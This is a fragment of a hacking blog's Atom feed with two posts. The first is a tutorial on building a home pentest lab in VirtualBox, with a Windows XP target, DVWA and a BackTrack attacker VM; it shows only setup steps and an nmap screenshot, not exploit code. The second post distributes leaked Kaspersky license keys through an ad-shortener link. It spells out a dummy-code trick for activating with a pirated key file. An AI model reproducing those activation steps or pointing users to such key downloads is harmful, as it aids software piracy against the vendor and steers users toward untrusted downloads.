src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-nt_lqXVPyn4/TtE04rYLgjI/AAAAAAAAA6s/h3DXGbg-TNY/s72-c/an7.PNG" height="72" 
width="72"/><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-2370883560292877112</id><published>2011-11-23T10:34:00.001+05:30</published><updated>2011-11-27T01:56:49.428+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="backtrack"/><category scheme="http://www.blogger.com/atom/ns#" term="cracking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="windows hacking"/><title type='text'>Setting up your own Pentesting/Hacking Network using a single Machine</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-1dYI0CAoqLo/TsyjjOGWxlI/AAAAAAAAA6E/aG7LnSIzDuE/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;149&quot; src=&quot;http://4.bp.blogspot.com/-1dYI0CAoqLo/TsyjjOGWxlI/AAAAAAAAA6E/aG7LnSIzDuE/s200/images.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hello friends. Sorry for the long delay in writing a new post. I was out for some days and had no internet connectivity. When I came back and checked my mail, I found more than 10 mails asking me how to test for hacking. 
Actually this problem arises because there are too many&amp;nbsp;theoretical&amp;nbsp;tutorials available on the internet but hardly any practical implementations shown.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&amp;nbsp;So the big problem lies in testing your knowledge. Unless you&amp;nbsp;have practical exposure to hacking, you cannot really understand the&amp;nbsp;strength&amp;nbsp;of it. So I decided to reveal the professionals&#39; secret of pentesting/hacking. The technique I will discuss here will be advantageous for those who have only a single system and want to set up a testing network using it. In case you have multiple systems then you can easily test your skills by making one system the target and the other the attacker. But what to do when we have only a single system at our disposal? No need to worry. A virtual machine is the ultimate solution. You can set up your own hacking network and apply your skills to gain practical exposure to hacking.&lt;br /&gt;The only thing to look for is your system&#39;s hardware configuration. You should have minimum 2 GB RAM but it is highly&amp;nbsp;recommended&amp;nbsp;to use 3 GB RAM for a 32 bit operating system.&lt;br /&gt;We will be using Oracle VirtualBox in this tutorial. You can download virtualbox from this link - &lt;a href=&quot;https://www.virtualbox.org/wiki/Downloads&quot; target=&quot;_blank&quot;&gt;VBox&lt;/a&gt;.&lt;br /&gt;Once you have installed Vbox, the next step is to download the Extension Pack. It has to be the same version as the VirtualBox you installed; the one linked here is for 4.0.14 - &lt;a href=&quot;http://download.virtualbox.org/virtualbox/4.0.14/Oracle_VM_VirtualBox_Extension_Pack-4.0.14-74382.vbox-extpack&quot; target=&quot;_blank&quot;&gt;VBox Extension pack.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Once you have followed these initial steps, you are half done. The next step is to set up a target operating system. Suppose you want to set WINDOWS XP SP2 as the target operating system. 
You will need a bootable Windows XP SP2 iso for that. You can easily download it from Microsoft website or torrent. You can refer to this quick tutorial on how to setup a virtual machine using VBox and WIN XP.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;object class=&quot;BLOGGER-youtube-video&quot; classid=&quot;clsid:D27CDB6E-AE6D-11cf-96B8-444553540000&quot; codebase=&quot;http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0&quot; data-thumbnail-src=&quot;http://2.gvt0.com/vi/_D9kYJ9KPlo/0.jpg&quot; height=&quot;266&quot; width=&quot;320&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/_D9kYJ9KPlo&amp;fs=1&amp;source=uds&quot; /&gt;  &lt;param name=&quot;bgcolor&quot; value=&quot;#FFFFFF&quot; /&gt;  &lt;embed width=&quot;320&quot; height=&quot;266&quot;  src=&quot;http://www.youtube.com/v/_D9kYJ9KPlo&amp;fs=1&amp;source=uds&quot; type=&quot;application/x-shockwave-flash&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;br /&gt;So now you have a virtual machine where you can test all your applications and hacks.&lt;br /&gt;What is the next step that you can do with this virtual machine ? &amp;nbsp;Let us install a WAMP server and run DVWA over it. For those who are not aware of DVWA can check this link -&lt;a href=&quot;http://hackingalert.blogspot.com/2011/09/learn-hacking-by-doing-practical.html&quot; target=&quot;_blank&quot;&gt; Installing and working with DVWA.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;How to install applications on a virtual machine? Well the process is simple. 
When your Windows XP Virtual machine is running, click on the DEVICE tab, move to USB and select your pendrive from the list.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-H5iugCoEp-c/TsyJ0qlig6I/AAAAAAAAA5M/Svo9tXfe6Mo/s1600/vm1.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;254&quot; src=&quot;http://1.bp.blogspot.com/-H5iugCoEp-c/TsyJ0qlig6I/AAAAAAAAA5M/Svo9tXfe6Mo/s320/vm1.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Now you can install anything from a USB drive inside your virtual machine. There is also a facility to create a shared folder with your host operating system but I would prefer that you use USB. Shared folders have some issues when your host operating system is Windows 7. You can install different servers, applications, RAT clients etc and play with them.&lt;br /&gt;&lt;br /&gt;Now what are the advantages of this virtual machine? Let us analyse:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;You can test viruses and RATs with far less risk, because they run inside the guest and not on your base operating system. That isolation only covers what you leave disconnected: an attached USB drive, a shared folder or a NAT adapter each give a sample a path out of the guest, so detach them before you run anything live.&amp;nbsp;&lt;/li&gt;&lt;li&gt;You can test different servers and applications easily without affecting your base operating system.&amp;nbsp;&lt;/li&gt;&lt;li&gt;In case the Virtual machine gets corrupted then you can re-install it.&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;There are also some key factors that you should remember which will help you during your pentesting:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Create a clone of the virtual machine&lt;/b&gt;&lt;br /&gt;This step is very helpful in case your VM gets corrupted. 
Creating a clone of it will save you from re-installing it again and again.&lt;br /&gt;You can create a clone by right clicking on the Virtual machine instance in VBox and clicking on &quot;clone..&quot;&lt;br /&gt;You will notice that a cloned virtual WinXP will be created for you.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-bSxWP4vXTq8/TsyMR0TDeiI/AAAAAAAAA5c/G9KjE291zUY/s1600/vm3.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;172&quot; src=&quot;http://1.bp.blogspot.com/-bSxWP4vXTq8/TsyMR0TDeiI/AAAAAAAAA5c/G9KjE291zUY/s400/vm3.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;Disable the windows Firewall&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;The next important thing you can do is disable the windows firewall and then perform your pentesting as the firewall may block some of the suspicious activities. Do this only inside the target virtual machine, never on your host; an XP guest with its firewall off should be reachable only over the lab network between your virtual machines. Using the default Windows firewall of the XP virtual machine you can also test whether your activity is traceable or not. This will give you a clear understanding why RATs are not&amp;nbsp;considered&amp;nbsp;as a suitable hack these days because they are easily detectable. You can disable the firewall by going to Control Panel, clicking on Firewall and then disabling it.&lt;br /&gt;In this way you can set up a suitable environment for your home experiments.&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;u&gt;WHAT NEXT ?&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Well a good question to ask if you have understood the above concepts. 
So far we discussed how to test different tools and techniques on a virtual operating system. The next step will be how to hack one virtual machine using the other. The scenario will be similar to hacking any system on the internet so this technique will give you real time exposure. Interesting... Let&#39;s proceed then. This time we will set up another virtual machine using the BACKTRACK operating system which is one of the penetration testing operating systems most widely used by security professionals. The reasons which make backtrack so popular are:&lt;br /&gt;&lt;br /&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;It has all the relevant tools pre-installed&lt;/li&gt;&lt;li&gt;it is linux based.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;You can download the Backtrack 5 iso from its official website. It&#39;s a must have operating system for all.&amp;nbsp;&lt;/div&gt;&lt;div&gt;You can follow this simple video to install BT on virtualbox.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.youtube.com/embed/up2OR1M0aUk?feature=player_embedded&#39; frameborder=&#39;0&#39; /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Once you are done with the installation part, the next step is to make the two virtual machines (BT and WinXP) connect with each other. There is a simple setting that you will have to make in both the virtual machines. Let&#39;s check it out.&amp;nbsp;&lt;/div&gt;&lt;div&gt;Select the Backtrack virtual machine, then click on the settings tab, then move to &quot;network&quot; settings. You will find that &quot;Adapter 1&quot; is set to NAT adapter. 
Switch to the &quot;Adapter 2&quot; tab.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-fA_8A0l0VCc/TsyZw3oJbXI/AAAAAAAAA5k/1jCPL52dBCI/s1600/vm4.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;http://1.bp.blogspot.com/-fA_8A0l0VCc/TsyZw3oJbXI/AAAAAAAAA5k/1jCPL52dBCI/s640/vm4.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;In the Adapter2 tab, set the adapter as &quot;Host-Only Adapter&quot;. Set the name of adapter as &quot;VirtualBox Host Only Ethernet Adapter&quot; . See the figure.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-SgP4sPMWy8E/TsyZyuz4iPI/AAAAAAAAA5s/YJhptTFDibo/s1600/vm5.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;478&quot; src=&quot;http://4.bp.blogspot.com/-SgP4sPMWy8E/TsyZyuz4iPI/AAAAAAAAA5s/YJhptTFDibo/s640/vm5.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Make similar setting changes in your windows XP virtual machine as well. Now your two virtual machines are ready to connect with each other. You can check the IP address of Windows machine by using the ipconfig command in the command prompt and similarly you can check the IP address of the BT machine using the ifconfig command. Also you can ping the two machines to check if both are detecting each other (don&#39;t&amp;nbsp;forget to disable the windows firewall else it will filter the ping data packets).&lt;br /&gt;The following image shows my two virtual machines. One is WinXP and other is BT5 with there&amp;nbsp;corresponding ip addresses. 
Both are running over my host operating system Win7. So in all there are 3 operating systems running simultaneously.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-q3PF57va6yY/TsyeHMlHcDI/AAAAAAAAA50/-e6DmpLFlUk/s1600/vm6.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;281&quot; src=&quot;http://3.bp.blogspot.com/-q3PF57va6yY/TsyeHMlHcDI/AAAAAAAAA50/-e6DmpLFlUk/s640/vm6.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Now you can use various options available in Backtrack OS to perform tests on the WinXP box. Let us quickly perform an nmap scan to check the open ports on the WinXP machine.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-KebGDaG3iMY/Tsyfh4Qv14I/AAAAAAAAA58/kIP6EugTqhc/s1600/vm7.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;272&quot; src=&quot;http://2.bp.blogspot.com/-KebGDaG3iMY/Tsyfh4Qv14I/AAAAAAAAA58/kIP6EugTqhc/s400/vm7.PNG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;As you can see, the target is up and has some open ports as well. 
Similarly you can perform several attacks and use the tools available in Backtrack to penetrate the target windows XP machine without harming your own operating system.&lt;br /&gt;You can use this technique to perform several tests like :&lt;br /&gt;&lt;br /&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;You can try to hack different operating systems by installing them as a virtual machine.&amp;nbsp;&lt;/li&gt;&lt;li&gt;This will give a real time simulation of the original scenario.&lt;/li&gt;&lt;li&gt;You can increase the level of difficulty of your hacks by installing firewalls, IDS/IPS etc.&amp;nbsp;&lt;/li&gt;&lt;li&gt;This is a self&amp;nbsp;customization&amp;nbsp;scenario where you can do whatever you want.&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;This is just a quick example for you all to get started with using VMs for pentesting and hacking. You can take this tutorial further to the next level by experimenting with various&amp;nbsp;flavors&amp;nbsp;of operating systems and trying your hands on them. This can be like a practice Battlefield for you before you dive deep into the real fight.&lt;br /&gt;&lt;br /&gt;There are several small problems which you may encounter while performing these steps. So keep adding your queries so that I can help you resolve them. This is one of the most unique tutorials you will find on the internet. So keep adding your comments and queries so that you can enjoy this technique. 
Once you have successfully performed it, you will love playing with this scenario.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/2370883560292877112/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/11/setting-up-your-own-pentestinghacking.html#comment-form' title='12 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2370883560292877112'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2370883560292877112'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/11/setting-up-your-own-pentestinghacking.html' title='Setting up your own Pentesting/Hacking Network using a single Machine'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-1dYI0CAoqLo/TsyjjOGWxlI/AAAAAAAAA6E/aG7LnSIzDuE/s72-c/images.jpg" height="72" width="72"/><thr:total>12</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-7734761583637703261</id><published>2011-11-15T11:03:00.001+05:30</published><updated>2011-12-19T12:05:06.391+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="kaspersky antivirus 2012 key"/><category scheme="http://www.blogger.com/atom/ns#" term="kaspersky internet security 2012 key"/><category scheme="http://www.blogger.com/atom/ns#" term="Kaspersky pure key"/><category 
scheme="http://www.blogger.com/atom/ns#" term="serials and keys"/><title type='text'>Kaspersky Pure and Kaspersky 2012 Latest keys - Not Blocked</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-q6palCwPk1M/TsH68ILIaLI/AAAAAAAAA5A/ua7H8W9Mq8I/s1600/2012.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;140&quot; src=&quot;http://2.bp.blogspot.com/-q6palCwPk1M/TsH68ILIaLI/AAAAAAAAA5A/ua7H8W9Mq8I/s200/2012.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Some latest keys for Kaspersky are leaked again. Grab your key immideately. Stay connected with HackingAlert for regular updates of Kespersky keys.&lt;br /&gt;&lt;br /&gt;Activation Method:&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;1. Open Kaspersky 2011 License Manager (from lower right corner).&lt;br /&gt;&lt;br /&gt;&amp;nbsp; 2. Click Activate the application with a new license button. (Delete any trial key&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; first,by clicking the red X next to the key).&lt;br /&gt;&lt;br /&gt;&amp;nbsp; 3. Select Activate commercial version and enter the activation license code as&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; 11111-11111-11111-1111X&lt;br /&gt;&lt;br /&gt;&amp;nbsp; 4. 
Wait activation wizard message-&amp;gt;Click OK&lt;br /&gt;&lt;br /&gt;&amp;nbsp; 5. Wait for wrong activation code message-&amp;gt;Click OK-&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; 6. Screen will appear with KEY FILE BROWSE&lt;br /&gt;&lt;br /&gt;&amp;nbsp; 7. Browse to the key&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; location and activate kaspersky.&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://adf.ly/3jOlW&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;DOWNLOAD KEYS&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/7734761583637703261/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/11/kaspersky-pure-and-kaspersky-2012.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/7734761583637703261'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/7734761583637703261'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/11/kaspersky-pure-and-kaspersky-2012.html' title='Kaspersky Pure and Kaspersky 2012 Latest keys - Not Blocked'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-q6palCwPk1M/TsH68ILIaLI/AAAAAAAAA5A/ua7H8W9Mq8I/s72-c/2012.jpg" height="72" width="72"/><thr:total>2</thr:total></entry></feed>